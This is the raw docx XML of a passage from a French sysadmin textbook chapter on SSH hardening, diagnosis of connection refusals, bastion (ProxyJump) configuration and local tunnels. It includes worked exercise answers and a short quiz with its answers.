                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rebond interne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3051"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>AllowTcpForwarding no</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Limite le pivot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>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Balayage de ports</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fail2ban</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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Blocage temporaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vol de clé</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Phrase secrète + agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Clé inutilisable seule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>59.5 Diagnostiquer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un refus SSH a cinq causes principales. Le message d'erreur du client indique presque toujours laquelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.211 — Cinq messages et leur cause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19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Message</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Connection refused</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Service arrêté ou port filtré</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2635"/>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Vérifier </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ss -ltnp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Permission denied (publickey)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Clé absente ou droits incorrects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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ssh -vvv</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Host key verification failed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Empreinte changée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2635"/>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Vérifier, puis </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>known_hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Connection timed out</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Pare-feu ou routage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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nc -zv</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Too many authentication failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Trop de clés proposées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2635"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>IdentitiesOnly yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois sources de diagnostic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Diagnostic détaillé côté client</w:t>
        <w:br/>
        <w:t>ssh -vvv deploy@serveur 2&gt;&amp;1 | tail -40</w:t>
        <w:br/>
        <w:br/>
        <w:t># Côté serveur, en cas d'échec</w:t>
        <w:br/>
        <w:t>journalctl -u ssh -n 50 --no-pager</w:t>
        <w:br/>
        <w:t>tail -f /var/log/auth.log</w:t>
        <w:br/>
        <w:br/>
        <w:t># Tester le port sans SSH</w:t>
        <w:br/>
        <w:t>nc -zv serveur 22</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ROTATION D'UNE CLÉ COMPROMISE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Retirer la clé publique de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>authorized_keys</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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Vérifier les connexions récentes dans </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>auth.log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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Générer une nouvelle paire avec phrase secrète.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Déployer la nouvelle clé et tester.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Consigner la rotation.</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L'authentification par clé remplace le mot de passe.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Ed25519 est le choix par défaut recommandé.</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Les droits sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>~/.ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> doivent être restrictifs.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L'agent conserve les clés déverrouillées pour la session.</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~/.ssh/config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rend les accès lisibles et reproductibles.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tunnels évitent d'exposer des ports inutiles.</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PermitRootLogin no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PasswordAuthentication no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sont les deux mesures de base.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Toujours tester avant de fermer la session qui a modifié SSH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'accès distant est maîtrisé. Le chapitre suivant installe le logiciel qui répond aux requêtes : le serveur web.</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59.1 — Configurer un accès par rebond</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Les serveurs internes ne sont joignables que via un bastion.</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Déclarez le bastion.</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Déclarez les serveurs internes.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Testez sans commande complexe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 59.2 — Ouvrir un tunnel vers une base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La base PostgreSQL n'est accessible que depuis le serveur.</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Créez le tunnel.</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Connectez-vous en local.</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la fermeture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 59.3 — Diagnostiquer un refus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   DIAGNOSTIC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Permission denied (publickey)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur un serveur qui fonctionnait hier.</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Vérifiez la clé proposée.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Vérifiez les droits.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Consultez le journal serveur.</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59.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Host bastion</w:t>
        <w:br/>
        <w:t xml:space="preserve">    HostName bastion.exemple.fr</w:t>
        <w:br/>
        <w:t xml:space="preserve">    User jump</w:t>
        <w:br/>
        <w:t xml:space="preserve">    IdentityFile ~/.ssh/id_bastion</w:t>
        <w:br/>
        <w:br/>
        <w:t>Host web1 web2</w:t>
        <w:br/>
        <w:t xml:space="preserve">    User deploy</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ProxyJump bastion</w:t>
        <w:br/>
        <w:t xml:space="preserve">    IdentityFile ~/.ssh/id_deploy</w:t>
        <w:br/>
        <w:br/>
        <w:t>Host *.interne</w:t>
        <w:br/>
        <w:t xml:space="preserve">    User admin</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ProxyJump bastion</w:t>
        <w:br/>
        <w:t xml:space="preserve">    IdentitiesOnly yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ProxyJump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> remplace une commande </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ssh -J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> longue et fragile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>IdentitiesOnly yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite l'échec « too many authentication failures » quand l'agent propose trop de clés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 59.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ssh -N -L 15432:localhost:5432 deploy@serveur</w:t>
        <w:br/>
        <w:br/>
        <w:t># Dans un autre terminal</w:t>
        <w:br/>
        <w:t>psql -h 127.0.0.1 -p 15432 -U app -d app</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier l'écoute locale</w:t>
        <w:br/>
        <w:t>ss -ltnp | grep 15432</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'ouvre pas de shell : la connexion ne sert qu'au tunnel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le tunnel se ferme avec la session SSH : pour un usage durable, utilisez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>autossh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou une unité systemd.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 59.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ssh -vvv deploy@serveur 2&gt;&amp;1 | grep -A3 "Offering"</w:t>
        <w:br/>
        <w:t>ls -l ~/.ssh</w:t>
        <w:br/>
        <w:t>ssh-add -l</w:t>
        <w:br/>
        <w:br/>
        <w:t># Côté serveur (via la console du fournisseur)</w:t>
        <w:br/>
        <w:t>journalctl -u ssh -n 30</w:t>
        <w:br/>
        <w:t>grep "deploy" /var/log/auth.log | tail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ssh -vvv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> montre les clés proposées et celles acceptées ou refusées.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Des droits trop ouverts sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provoquent un refus silencieux côté serveur.</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Quelle clé est recommandée par défaut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RSA 1024</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DSA</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Ed25519</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ECDSA 521</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ProxyJump</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Chiffre la session</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Traverse un hôte intermédiaire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Ouvre un SOCKS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Copie des fichiers</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Quelle directive interdit l'accès root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AllowUsers</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PermitRootLogin no</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MaxAuthTries</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PasswordAuthentication no</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 xml:space="preserve">Que signifie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Permission denied (publickey)</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Le réseau est coupé</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La clé proposée n'est pas acceptée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 serveur est éteint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 DNS échoue</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Quel transfert expose un service local sur le serveur distant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-L</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-R</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-D</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-N</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C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ed25519 offre une bonne sécurité avec des clés courtes et rapides.</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Il ouvre la connexion via un bastion, de façon transparente.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PermitRootLogin no</w:t>
      </w:r>
